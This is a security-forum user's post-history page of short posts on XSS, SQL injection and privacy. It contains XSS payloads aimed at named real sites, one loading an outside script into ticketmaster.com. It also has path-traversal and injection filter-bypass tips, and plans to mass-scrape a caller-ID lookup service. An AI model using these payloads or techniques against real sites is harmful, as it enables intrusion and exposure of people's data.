Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 

Pages: 12345...LastNext
Current Page: 1 of 13
Results 1 - 30 of 383
1 year ago
PaPPy
saw this today Tinkode fined more than $120,000 and sentanced to 2 years in jail. http://www.computerworlduk.com/news/security/3403725/tinkode-gets-two-year-suspended-sentence-for-nasa-pentagon-hack/
Forum: News and Links
1 year ago
PaPPy
I remember someone doing this before.. But if you wanted to start on your own, I would look at what sqlninja has to offer and start designing some features from it: http://sqlninja.sourceforge.net/sqlninjademo.html Also you could get havij, and do some wireshark sniffing to see all the ways it trys to SQL inject the increment part wouldn't be hard: http://www.tizag.com/phpT/whileloop.php
Forum: SQL and Code Injection
2 years ago
PaPPy
look for webserver log files or httpd
Forum: SQL and Code Injection
2 years ago
PaPPy
how can you be infected with an SQL server?
Forum: SQL and Code Injection
2 years ago
PaPPy
lol first thing i noticed
Forum: XSS Info
2 years ago
PaPPy
Looks like someone beat me to the punch: http://tndb.us/
Forum: Privacy
2 years ago
PaPPy
didnt find xss but broke something here http://adliran.ir/TrmBill/Bill.aspx?CtrlId="
Forum: XSS Info
2 years ago
PaPPy
Came up with this script to find all files and clean them http://pastebin.mozilla.org/1577737
Forum: Obfuscation
2 years ago
PaPPy
The Payload is the GetMama Malware http://blog.sucuri.net/2012/04/getmama-conditional-malware-affecting-thousands-of-sites.html It was base64 encoded a lot This shows what the javascript looks like http://sucuri.net/new-malware-eval-getmama-encoded-javascript.html Here is a commented version of your above code, explaining the decoding process http://pastebin.me/bc23773578d79a55882d7c
Forum: Obfuscation
2 years ago
PaPPy
is onmouseover restricted? if not use the same style so anywhere on screen they move the mouse, it will cause the xss to run
Forum: XSS Info
2 years ago
PaPPy
sql server shouldnt be running as root, or have any read/write permission. so load_file and into outfile, can not be used
Forum: SQL and Code Injection
2 years ago
PaPPy
found them http://www.xssed.com/archive/domain=baidu.com
Forum: XSS Info
2 years ago
PaPPy
wow very difficult, its like people dont even try
Forum: SQL and Code Injection
2 years ago
PaPPy
I didn't see anything about extradition to the US. I don't know how the laws are in Romania... but he problably is "fucked".
Forum: News and Links
2 years ago
PaPPy
TinKode Arrested in Romania for hacking into NASA and the Pentagon http://www.pcmag.com/article2/0,2817,2399698,00.asp
Forum: News and Links
2 years ago
PaPPy
have you tried any of these? https://x.x.x.x/b/l.e?null=http://hXvpfwkV.example.com/?test=">test https://x.x.x.x/b/l.e?null=http://hXvpfwkV.example.com/">test https://x.x.x.x/b/l.e?null=http://hXvpfwkV.example.com/#">test
Forum: XSS Info
2 years ago
PaPPy
So I was perusing around our local Sur La Table and came across this http://i.imgur.com/LeGpD.jpg (to the left is a Cisco VoIP phone that it was plugged in to) Needless to say it caught my attention. I tried the 3 finger salute, I tried the Windows button, and the windows + D button and I wasn't getting anywhere. So I started to poke around the menus and all that I had access to wa
Forum: Full Disclosure
2 years ago
PaPPy
I know this is an old post, but here is some break downs 7,889,999,999 possibilities (no exclusions from 2010000000 - 9899999999) divide by 199 attempts a day 39,648,242 days require to check all divide by 365 days 108,626 years to complete 3,270,000,461 possibilities (according to possibilities on their website. excludes non available area codes) divide by 199 att
Forum: Privacy
2 years ago
PaPPy
I am trying to decrypt the image created text on tnid.us I have already written a post on how to read all the possibilities with OCR (http://sla.ckers.org/forum/read.php?15,36823,36823#msg-36823), but I want to try cracking the string, as it would go so much faster (and less software to install). I have tried eliminated common letters like N2tLG5e6t10I-dici1q662kZ2LtQ.. But I don't know
Forum: Projects
2 years ago
PaPPy
are there any characters the web server is stripping? example: ~ is stripped un~ion se~lect....etc etc i one time saw the word union stripped so it turned into UNunionION SELunionECT 1,2,3,4,5
Forum: SQL and Code Injection
2 years ago
PaPPy
thanks, hope it slows down the spam
Forum: News and Links
2 years ago
PaPPy
i used the php version and it worked fine
Forum: XSS Info
2 years ago
PaPPy
http://ntr.ticketmaster.com/ntw/forward?from=-->"><script src=http://vuln.xssed.net/thirdparty/scripts/ckers.org.js></script>
Forum: Full Disclosure
2 years ago
PaPPy
Came across this service that is offering a service to scan your devices for a fee. http://www.secpoint.com/cloud-penetrator-web-vulnerability-scanner.html But I noticed 2 potential problems First they have an image that includes a remote image. not sure if this can be exploited http://www.secpoint.com/thumb.php?img=http://data.xssed.org/images/xssed_logo.gif&h=100&w=150&d
Forum: Full Disclosure
2 years ago
PaPPy
http://rankmyhack.com/login.php?r="><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)</script><script>alert(1)&
Forum: Full Disclosure
3 years ago
PaPPy
So I came across a Twitter post from Kevin Mitnick https://twitter.com/#!/kevinmitnick/status/96331122321006592 "Wow! ATT gives out your information to anyone. Check it out: http://tnid.us" So tnid.us allows you to put in a cellphone number and it will give you the corresponding Caller ID information.(and some other info) Well I noticed that they had no automation protection (oth
Forum: Privacy
3 years ago
PaPPy
Fiance visited ladygaga.com and Nod32 popped up a blocked .js script hxxp://c390749.r49.cf2.rackcdn.com/ursvp/widget/js/ursvp.js I dont want to open it, but any search for rackcdn.com + malware, shows lots of results. Thought yall would find it amusing, that such a big star, can't afford good web security.
Forum: News and Links
3 years ago
PaPPy
did you try /etc/passwd%00 or /etc/passwd%0a
Forum: SQL and Code Injection
3 years ago
PaPPy
http://www.google.com/search?q=moodle+vulnerability&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a RCE http://tracker.moodle.org/browse/MDL-17207 SQL injection http://www.securityfocus.com/bid/20395 google, its a hell of a drug
Forum: SQL and Code Injection
Pages: 12345...LastNext
Current Page: 1 of 13